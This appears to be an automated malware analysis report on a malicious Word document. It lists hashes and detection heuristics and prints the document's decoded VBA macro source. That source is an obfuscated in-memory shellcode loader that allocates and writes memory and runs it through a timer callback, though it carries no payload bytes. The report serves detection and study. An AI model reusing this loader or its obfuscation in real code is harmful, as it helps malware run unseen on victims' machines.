Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0763c6839423e687…

MALICIOUS

Office (OLE)

313.5 KB Created: 2017-11-21 13:11:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 94cbcda4655c7e5ec8acd2c72cf0adcd SHA-1: 74f7508e08cb7dce1a6a1f406bc84c36e0316e9a SHA-256: 0763c6839423e687b35e7a4bc8c006e233730e8633128a9753f806f89c573aea
82 Risk Score

Heuristics 3

  • Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER
    Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6601 bytes
SHA-256: ae990ab2d6f06f82402b627cf6e15fe22f737a2c96029645b8240d702749d22b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "portos"
'  His passion is a kiss
'  Your love I can't dismiss
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
'  Stirb nicht
'  Dont die before I do
Public Declare PtrSafe Function summary _
Lib "ntdll   " Alias _
"NtWriteVirtualMemory" (ByVal degeneration As Any, ByVal somatotropin As Any, ByVal caduceus As Any, ByVal monasticism As Any, ByVal amotion As Any) As LongPtr
'  Ich warte hier
'  I dont know who you are
Public Declare PtrSafe Function euphorbium Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal chipping As Any, gangrenous As Any, categorial As Any, aerodynamics As Any) As LongPtr
'  Die Nacht A¶ffnet ihren SchoAY
'  Ich weine leise in die Zeit
#End If
'  Die Nacht A¶ffnet ihren SchoAY
'  Es ist kalt und regungslos
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  I dont know who you are
Public Declare Function carelessly Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal noahs As Any, fortunately As Any, denounce As Any, synchrocyclotron As Any) As Long
'  I dont know who he is
'  Ich weiAY dass irgendwann
#End If
'  Doch ich weiAY dass es dich gibt
'  Ich weine leise in die Zeit

Function endowed(horrifyingly, flyfishing, obliteration)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim rescription As LongPtr
Dim cenchrus As LongPtr
Dim although As LongPtr
Dim ephemerality As LongPtr
Dim uncommunicativeness As LongPtr
#End If
#If (44 - 40 + 396 + 120 - 65 + 245) > ((58 - 7 + 269) - (47 - 37 + 530) * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim cenchrus As Long
Dim rescription As Long
Dim ephemerality As Long
Dim although As Long
Dim expiable As String
Dim uncommunicativeness As Long
#End If
cenchrus = horrifyingly
uncommunicativeness = obliteration
ephemerality = flyfishing
chancroidal = 60 + 48
Pmt 0, chancroidal, 22143, 18381, 4
adenoidal = Rnd(83)
rescription = 35 - 74 + 38
summary ByVal rescription, cenchrus, ephemerality, uncommunicativeness, although
naja = "bever"
End Function

Function zambia()
Dim bi(255) As Byte
coniferopsida = 16 - 86 + 135
Do While coniferopsida <= 90 + 1
bi(coniferopsida) = coniferopsida - 65
coniferopsida = coniferopsida + 1
Loop
coniferopsida = 48
Do While coniferopsida <= 50 + 8
bi(coniferopsida) = coniferopsida + 4
coniferopsida = coniferopsida + 1
Loop
coniferopsida = 97
Do While coniferopsida <= 120 + 3
bi(coniferopsida) = coniferopsida - 71
coniferopsida = coniferopsida + 1
Loop
bi(47) = 63
coniferopsida = 43
bi(coniferopsida) = 60 + 2
zambia = bi
End Function

Attribute VB_Name = "mildran"
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Public Declare _
PtrSafe Function homocercal Lib "ntdll  " Alias _
"NtAllocateVirtualMemory" (mb As LongPtr, draped As LongPtr, ByVal halfhearted As LongPtr, pandiculationByVal As LongPtr, professionalism As LongPtr, ByVal meryta As LongPtr) As LongPtr
#ElseIf (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
Public Declare Function summary Lib "ntdll   " Alias "NtWriteVirtualMemory" (ByVal ademption As Any, ByVal accredit As Any, ByVal transit As Any, ByVal absolved As Any, ByVal arma As Any) As Long
#End If

Function eyelid(kriegspiel)
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim cosmetologist As Long
architeuthis = 44 - 59 + 19
Dim homophonic As Long
Dim philosophers As Long
#End If
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim cosmetologist As LongPtr
architeuthis = 6 - 68 + 70
Dim homophonic As LongPtr
Dim philosophers As LongPtr
#End If
besieged = VarPtr(cosmetologist)
polemonium = endowed(besieged, VarPtr(kriegspiel) + 8, architeuthis)
real = 125 - 95 - 31
homophonic = 91 - 108 + 17
mirror = 40 - 120 + 80
philosophers = 86 - 108 + 9379
droplet = 29 - 117 + 4184
disheartened = 124 - 67 + 7
intermezzo = homocercal(ByVal real, _
homophonic, ByVal mirror, philosophers, ByVal droplet, _
ByVal disheartened)
endowed homophonic, cosmetologist, 73 - 70 + 5880
necrology = 44 + 32
Pmt 0, necrology, 32324, 46690, 8
eyelid = homophonic
End Function

Function atopognosia(nerodia, papyrus, caterpillar)
Select Case caterpillar
Case 48 + (10 / 2 - 5)
atopognosia = nerodia \ papyrus
Case 58 + (5 - 3) / 2 - 1
atopognosia = nerodia And papyrus
Case 66 + (56 / 7 - 4 * 2)
atopognosia = nerodia * papyrus
End Select
End Function

Attribute VB_Name = "sideboard"
'  Es ist kalt und regungslos
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
'  Die Nacht A¶ffnet ihren SchoAY
'  Ich weiAY nicht wie du heiAYt
Public Declare Function clarinetist _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (obstinate As Any, ByVal aminomethane As Any, ByVal defy As Any, ByVal elre As Any, ByVal nfor As Any, ByVal bise As Any, ByVal allophonic As Any) As Long
'  Sometimes love seems so far
'  Dont die before I do
Public Declare Function homocercal Lib _
"ntdll  " Alias _
"NtAllocateVirtualMemory" (hindustan As Long, angler As Long, ByVal dislikable As Long, euphractusByVal As Long, retribution As Long, ByVal arrogance As Long) As Long
'  I close my eyes and pass away
'  I dont know who you are
Public Declare Function sod Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal homespun As Any, decolonization As Any, audile As Any, drip As Any) As Long
'  Ich warte hier
'  irgendwer mich liebt
#End If
'  His passion is a kiss
'  Your love I can't dismiss
#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
'  Stirb nicht
'  No words are left to say
Public Declare PtrSafe Function planococcus Lib "Shlwapi.dll  " _
Alias "SleepConditionVariableSRW" (ByVal cacation As Any, faciles As Any, diethylstilbestrol As Any, barbecuing As Any) As LongPtr
'  Doch ich weiAY dass es dich gibt
'  Ich weiAY dass irgendwann
Public Declare PtrSafe Function clarinetist _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (aerography As Any, ByVal custacean As Any, ByVal shihtzu As Any, ByVal blastoderm As Any, ByVal bobble As Any, ByVal coadjutor As Any, ByVal phasianus As Any) As Long
'  Ich weine leise in die Zeit
#End If





Attribute VB_Name = "unwelcome"
Attribute VB_Base = "0{BEDAA815-8A97-4A26-8D30-53369C8F0A8B}{09205486-3054-4B45-A06E-0137BB9F7141}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False